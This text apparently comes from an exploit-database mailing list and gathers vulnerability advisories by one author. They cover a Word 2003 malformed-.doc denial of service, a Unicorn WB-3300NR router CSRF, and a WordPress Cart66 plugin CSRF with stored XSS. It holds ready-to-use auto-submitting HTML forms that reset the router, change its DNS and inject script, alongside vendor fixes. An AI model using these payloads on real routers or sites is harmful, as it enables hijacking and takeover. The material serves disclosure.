Re: Word 2003 SP2 .doc fork bomb on WinXP SP3
I am sorry, but can this be edited to include Word 2003 SP3 as well? I forgot to mention I tested on both SP2 and SP3 of Word 2003. Thanks, James
Word 2003 SP2 .doc fork bomb on WinXP SP3
# Exploit Title: Word 2003 SP2 .doc fork bomb on WinXP SP3 # Exploit Author:absane # Blog: http://blog.noobroot.com # Discovery date:November 8th 2003 # Vendor Homepage: http://www.microsoft.com # Tested on: Windows XP SP3 Word 2003 SP2 (11.6568.6568) ** * Vulnerability * ** A malformed .doc file with an embedded image causes a fork bomb in Word 2003 SP2 on Windows XP SP3 by comsuming 99% - 100% of the CPU cycles which can only be ended by teminating the process. ** *Proof of Concept* ** http://www.noobroot.com/exploits/word2003forkbomb.doc ** * Mitigation* ** The vulnerability does not appear to affect Office 2010+ and any other versions of Windows. Upgrade to Windows 7 or higher and/or upgrade to Office 2010 or higher.
Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)
# Exploit Title: Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)
# Exploit Author:absane
# Blog: http://blog.noobroot.com
# Discovery date:October 29th 2013
# Vendor Homepage:
http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr
# Tested on: Unicorn WB-3300NR v1.0
# Firmware Version: V5.07.18_ko_UIS02
***
*Vulnerability*
***
The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities.
Considering that by default the administrative pages do not require
authentication, countless exploits exist.
**
*Proof of Concept*
**
1) Factory Reset
htmlbody
iframe height=0 width=0 id=cantseeme name=cantseeme/iframe
form name=csrf_form action=http://192.168.123.254/goform/SysToolRestoreSet;
method=post target=cantseeme
input type=hidden name=CMD value='SYS_CONF'
input type=hidden name=GO value='system_reboot.asp'
input type=hidden name=CCMD value='0'
scriptdocument.csrf_form.submit();/script
/body/html
2) Alter the DNS Settings
htmlbody
iframe height=0 width=0 id=cantseeme name=cantseeme/iframe
form name=csrf_form action=http://192.168.123.254/goform/AdvSetDns;
method=post target=cantseeme
input type=hidden name=GO value='wan_dns.asp'
input type=hidden name=rebootTag value=''
input type=hidden name=DSEN value='1'
input type=hidden name=DNSEN value='on'
input type=hidden name=DS1 value='8.8.4.4'
input type=hidden name=DS2 value='8.8.8.8'
scriptdocument.csrf_form.submit();/script
/body/html
3) WPA Password Disclosure (possibility)(not proven)
The following PoC code only demostrates that with CSRF and XSS, it might be
possible to obtain the WPA password.
However, I have been unable to do so without forcing the router to revert to
factory defaults.
htmlbody
iframe height=0 width=0 id=cantseeme name=cantseeme/iframe
form name=csrf_form action=http://192.168.123.254/goform/WizardHandle;
method=post target=cantseeme
input type=hidden name=MACC value='; var x = ; function y()
{alert(def_wirelesspassword);} x = window.setTimeout(y,2000);//'
scriptdocument.csrf_form.submit();/script
/body/html
Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities # Exploit Author:absane # Blog: http://blog.noobroot.com # Discovery date:September 29th 2013 # Vendor notified: September 29th 2013 # Vendor fixed: October 12 2013 # Vendor Homepage: http://cart66.com # Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip # Tested on: Wordpress 3.6.1 # Google-dork: inurl:/wp-content/plugins/cart66 # CVE (CSRF):CVE-2013-5977 # CVE (XSS): CVE-2013-5978 Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14. Vulnerabilities: 1) CSRF 2) Code Injection VULNERABILITY #1 *** CSRF *** Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products Proof of Concept htmlbody form name=csrf_form action=http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products; method=post enctype=multipart/form-data id=products-form input type=hidden name=cart66-action value=save product / input type=hidden name=product[id] value= / input class=long type=hidden name='product[name]' id='product-name' value='absane was here' / input type='hidden' name='product[item_number]' id='product-item_number' value='1337' / input type='hidden' id=product-price name='product[price]' value='13.37' / input type='hidden' id=product-price_description name='product[price_description]' value='LuLz' / input type='hidden' id=product-is_user_price name='product[is_user_price]' value='0' / input type=hidden id=product-min_price name='product[min_price]' value='' / input type=hidden id=product-max_price name='product[max_price]' value='' / input type='hidden' id=product-taxable name='product[taxable]' value='0' input type='hidden' id=product-shipped name='product[shipped]' value='1' input type=hidden id=product-weight name=product[weight] value= / input type=hidden id=product-min_qty name='product[min_quantity]' value='' / input type=hidden id=product-max_qty name='product[max_quantity]' value='' / script type=text/javascriptdocument.csrf_form.submit();/script /body/html VULNERABILITY #2 *** *** Code Injection *** *** Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields: * Product name * Price description Proof of Concept In the vulnerable fields add scriptalert(0)/script or any other code. The code is placed directly into the database. Input is not sanatized and the code can be executed in ways that depend on the circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing product. ][ ]..SOLUTIONS.[ ][ Update to version 1.5.1.15 or greater.
Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:absane
# Blog: http://blog.noobroot.com
# Discovery date:September 29th 2013
# Vendor notified: September 29th 2013
# Vendor fixed: October 2 2013
# Vendor Homepage: http://cart66.com
# Software Link:
http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on: Wordpress 3.6.1
# Google-dork: inurl:/wp-content/plugins/cart66
# CVE (CSRF):CVE-2013-5977
# CVE (XSS): CVE-2013-5978
Two vulnerabilities were discovered in the Wordpress plugin Cart66 version
1.5.1.14.
Vulnerabilities:
1) XSS (Stored)
2) CSRF
VULNERABILITY #1
***
*** Stored XSS ***
***
Page affected:
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the
following input fields:
* Product name
* Price description
Proof of Concept
In the vulnerable fields add scriptalert(0)/script
The product name XSS vuln is particiularly dangerous because an attacker can
use the CSRF vulnerability to add a product whose
name is a malicious script. All the admin user needs to do is view the product
to be attacked.
//
\\
VULNERABILITY #2
*** CSRF ***
Page affected:
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products
If the Wordpress admin were logged in and clicked on a link hosting code
similar to the one in the PoC, then the admin may
unknowingly add a product to his site or have an existing product altered.
Other possibilities include, but are not limited
to, injecting code into a field vulnerable to stored XSS (see the second
vulnerability).
Proof of Concept
Host this code on a remote wesbserver different from the Wordpress site that
uses Cart66. As an authenticated Wordpress admin
user visit the page and add what you will to the fields. A new product is
added. In a live attack, the fields will be hidden,
prefilled, and some javascript code will auto submit the fields.
htmlbody
form name=csrf_form
action=http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products;
method=post
enctype=multipart/form-data id=products-form
input type=hidden name=cart66-action value=save product /
input type=hidden name=product[id] value= /
input class=long type=hidden name='product[name]' id='product-name'
value='scriptalert(pwned)/script' /
input type='hidden' name='product[item_number]' id='product-item_number'
value='1337' /
input type='hidden' id=product-price name='product[price]' value='13.37' /
input type='hidden' id=product-price_description
name='product[price_description]' value='scriptalert(;))/script' /
input type='hidden' id=product-is_user_price name='product[is_user_price]'
value='0' /
input type=hidden id=product-min_price name='product[min_price]' value=''
/
input type=hidden id=product-max_price name='product[max_price]' value=''
/
input type='hidden' id=product-taxable name='product[taxable]' value='0'
input type='hidden' id=product-shipped name='product[shipped]' value='1'
input type=hidden id=product-weight name=product[weight] value= /
input type=hidden id=product-min_qty name='product[min_quantity]' value=''
/
input type=hidden id=product-max_qty name='product[max_quantity]' value=''
/
script type=text/javascriptdocument.csrf_form.submit();/script
/body/html
][
]..SOLUTIONS.[
][
Grab the latest update! Or...
XSS
In products.php, replace the line:
$product-setData($_POST['product']);
with:
$product-setData(Cart66Common::postVal('product'));
CSRF
In products.php, replace the following:
form action=admin.php?page=cart66-products method=post
enctype=multipart/form-data id=products-form
input type=hidden name=cart66-action value=save product /
input type=hidden name=product[id] value=?php echo $product-id ? /
div id=widgets-left style=margin-right: 50px;
div id=available-widgets
with:
form action=admin.php?page=cart66-products method=post
enctype=multipart/form-data id=products-form
input type=hidden name=cart66_product_nonce value=?php echo
wp_create_nonce('cart66_product_nonce'); ? /
input type=hidden name=cart66-action value=save product /
input type=hidden name=product[id] value=?php echo $product-id ? /
div id=widgets-left style=margin-right: 50px;
div id=available-widgets
And, in Cart66Product.php replace the validate() function with:
public function validate() {
$errors = array();
if(!wp_verify_nonce($_POST['cart66_product_nonce'],
'cart66_product_nonce')) {
$errors['nonce'] = __(An
